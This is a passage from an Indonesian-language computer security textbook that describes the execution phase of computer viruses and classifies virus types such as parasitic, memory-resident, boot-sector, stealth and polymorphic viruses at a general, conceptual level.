4. Fase eksekusi (execution phase). Virus menjalankan fungsinya,
fungsinya mungkin sepele seperti sekedar menampilkan pesan dilayar
atau merusak seperti merusak program dan file-file data, dan
sebagainya. Kebanyakan virus melakukan kerjanya untuk suatu sistem
operasi tertentu, lebih spesifik lagi pada platform perangkat keras
tertentu. Virus-virus dirancang memanfaatkan rincian-rincian dan
kelemahan- kelemahan sistem tertentu.
7.2.5.2 Klasifikasi Virus
1. Parasitic virus. Merupakan virus tradisional dan bentuk virus yang paling
sering. Tipe ini mencantolkan dirinya ke file .exe. Virus mereplikasi
ketika program terinfeksi dieksekusi dengan mencari file-file .exe lain
untuk diinfeksi.
2. Memory resident virus. Virus memuatkan diri ke memori utama sebagai
bagian program yang menetap. Virus menginfeksi setiap program yang
dieksekusi.
3. Boot sector virus. Virus menginfeksi master boot record atau boot
record dan menyebar saat sistem diboot dari disk yang berisi virus.
4. Stealth virus. Virus yang bentuknya telah dirancang agar dapat
menyembunyikan diri dari deteksi perangkat lunakantivirus.
5. Polymorphic virus. Virus bermutasi setiap kali melakukan infeksi.
Deteksi dengan penandaan virus ini tidak dimungkinkan. Penulis
virus dapat melengkapi dengan alat-alat bantu penciptaan virus baru
(virus creation toolkit, yaitu rutin-rutin untuk menciptakan virus-virus
baru). Dengan alat bantu ini penciptaan virus baru dapat dilakukan
dengan cepat. Virus-virus yang diciptakan dengan alat bantu biasanya
kurang canggih dibanding
